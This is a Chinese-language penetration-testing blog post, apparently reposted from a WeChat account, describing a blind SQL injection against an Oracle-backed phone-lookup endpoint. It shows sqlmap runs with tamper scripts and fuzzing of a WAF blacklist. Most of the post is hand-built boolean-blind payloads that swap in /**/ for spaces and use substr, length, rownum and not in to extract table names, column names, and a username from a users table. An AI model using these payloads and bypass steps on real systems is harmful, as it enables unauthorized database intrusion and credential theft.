关于oracle注射获取数据的实战文章还是比较少的,比较多的都是写写思路或者罗列一些payload就结束了,再比较好一点的也就是绕个WAF获取个库名,真的把数据跑出来的文还是寥寥无几的,也许是因为工作或SRC要求如此吧,但是真的去跑数据的时候还是会遇到各种挑战的,且与君共享一篇oracle注射获取数据的文吧。
0x00 sqlmap梭哈
经典盲注
/queryByPhone?card=1&phone=13111111111'and'1'like'1&companysID=1![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
/queryByPhone?card=1&phone=13111111111'and'1'like'2&companysID=1
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
典型的盲注,判断出注入后,多数情况下会想到sqlmap梭哈,但是结果却是这样的:
sqlmap也很温馨的提示了,说是可以添加tamper脚本进行尝试,玩了一段时间注入的到这里很容易就想到了可能遇上安全防护了,当然这是后话,我们可以根据sqlmap的提示接着往下走,比如--tamper=space2comment
有结果了,瞬间对sqlmap又燃起了希望,接着跑库名试试
GG,这次不得行了,到这里单纯靠sqlmap显得不靠谱了,接下来就需要去摸清服务端的过滤规则了。
0x01 Fuzz黑名单注出库名
通过第一步得知空格被过滤了,输入被过滤的字符,看看服务端的响应:
服务端给出了友好提示,那我们直接fuzz字符,然后根据服务端响应就可以摸清过滤规则了
第二种,自定义字符字典(记得选中编码,GET请求URI中的特殊字符多数是需要url编码的,否则服务端会返回400)
很明显的看到<和>被过滤了,还有一个比较常用的|字符被干掉了,知道了这两点,其实跑个库名就很简单了,用between and替代大于小于号就行,继续利用sqlmap的tamper脚本
多数情况下挖到这里其实就可以交差结束战斗了,但是毕竟2023年第一个oracle注入,必须跑出数据呀,直接sqlmap
意料之中,因为|被干掉了,sqlmap跑oracle数据的payload中借助了|符号(挂个代理看payload发现的) (sqlmap.py --purge可以清除历史记录哟)
0x02 半手工出数据
user_tab_columns column_name
比较幸运的是length、substr、逗号都没有被干掉
1、获取表的数量
payload:
13111111111'and/**/(select/**/count(table_name)/**/from/**/user_tables)=/**/1/**/and'1'like'1
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
2、获取表名
先判断第一个表名长度
payload:
13111111111'and/**/(select/**/length(table_name)/**/from/**/user_tables/**/where/**/rownum=1)=/**/1/**/and'1'like'1
借助burp判断第一个表名长度:14
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
13111111111'and/**/(select/**/substr(table_name,1,1)/**/from/**/user_tables/**/where/**/rownum=1)=/**/'A'/**/and'1'like'1
(oracle数据库的库名、表名、字段都是需要大写的,还有常见的字符如_、$和数字,其中$需要进行url编码哟)
其它字符以此类推,最终注出第一个表名:BA******_NEWS
注出了第一个表名,后续表名借助rownum实现即可
判断第二个表名长度,只要not in第一个表名即可
13111111111'and/**/(select/**/length(table_name)/**/from/**/user_tables/**/where/**/rownum=1/**/and/**/table_name/**/not/**/in/**/('BA******_NEWS'))=/**/§1§/**/and'1'like'1
后续字符以此类推,其它表名玩法一样。
3、获取列名
先判断第一个列名长度
payload:
13111111111'and/**/(select/**/length(column_name)/**/from/**/user_tab_columns/**/where/**/table_name='BA******_NEWS'/**/and/**/rownum=1)=/**/'§1§'/**/and'1'like'1
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
13111111111'and/**/(select/**/substr(column_name,1,1)/**/from/**/user_tab_columns/**/where/**/table_name='BA******_NEWS'/**/and/**/rownum=1)=/**/'§1§'/**/and'1'like'1
获取其它列名的方法和获取表名一样,借助not in实现,如
13111111111'and/**/(select/**/length(column_name)/**/from/**/user_tab_columns/**/where/**/table_name='BA******_NEWS'/**/and/**/rownum=1/**/and/**/column_name/**/not/**/in/**/('ID'))=/**/'§1§'/**/and'1'like'1
13111111111'and/**/(select/**/substr(column_name,1,1)/**/from/**/user_tab_columns/**/where/**/table_name='BA******_NEWS'/**/and/**/rownum=1/**/and/**/column_name/**/not/**/in/**/('ID'))=/**/'§1§'/**/and'1'like'1
这里也可以写脚本跑哈,我就直接burp操作了一波,跑出一些可能包含敏感数据的表名就停下,然后跑其中的数据就行
4、获取敏感数据
经过了一段时间的注入,获取到了一个敏感表名:BA******_USERS,对应的字段:USERNAME,PASSWORD
接下来就直接获取对应的数据就行了,跑出一两条,证明危害即可
先判断第一个用户名长度
13111111111'and/**/(select/**/length(USERNAME)/**/from/**/BA******_USERS/**/where/**/rownum=1)='§1§'and'1'like'1
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
![Oracle注射之一射到底]( "Oracle注射之一”射”到底")
13111111111'and/**/(select/**/substr(USERNAME,§0§,1)/**/from/**/BA******_USERS/**/where/**/rownum=1)='§1§'and'1'like'1
按顺序组合即可获取对应数据:ba******admin
犹豫了两天,终于写了这个文,不觉间花了两个多小时的时间,写的还算比较细了,整个思路和利用过程基本都写到了,就这样吧,以后估计也不会如此细致的写注入的文了,且看且珍惜吧。
原文始发于微信公众号(安全艺术):Oracle注射之一”射”到底
评论